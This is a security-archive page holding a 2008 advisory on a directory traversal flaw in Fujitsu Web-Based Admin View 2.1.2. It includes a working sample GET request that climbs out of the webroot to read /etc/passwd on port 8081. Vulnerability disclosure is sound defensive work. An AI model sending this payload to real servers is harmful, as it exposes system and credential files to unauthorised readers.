fujitsu-traverse.txt

fujitsu-traverse.txt: Posted Aug 22, 2008; Authored by Deniz Cevik | Site intellectpro.com.tr; Fujitsu Web-Based Admin View version 2.1.2 suffers from a directory traversal vulnerability.; tags | exploit, web, file inclusion; SHA-256 | 9346267fb836e3abbe4ae26b5494f37f1a97d864da56456cc63bc045d54d3c34; Download | Favorite | View

fujitsu-traverse.txt

Fujitsu Web-Based Admin View Directory Traversal Vulnerability

 

Version: 2.1.2 on Solaris, Other versions may vulnerable

 

Vulnerability: Directory Traversal

 

Risk: Critical

 

Description:  Due to insufficient control of user inputs, Fujitsu
Web-based admin view reveals content of files residing in folders other
than webroot. This will allow an attacker to view arbitrary local files
within the context of the web server. 

 

Sample Request:

 

GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0

Host: target:8081

 

Deniz CEVIK

www.intellectpro.com.tr

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 90 files
Gentoo 31 files
Debian 22 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Amit Roy 4 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

fujitsu-traverse.txt

fujitsu-traverse.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

fujitsu-traverse.txt

Share This

fujitsu-traverse.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems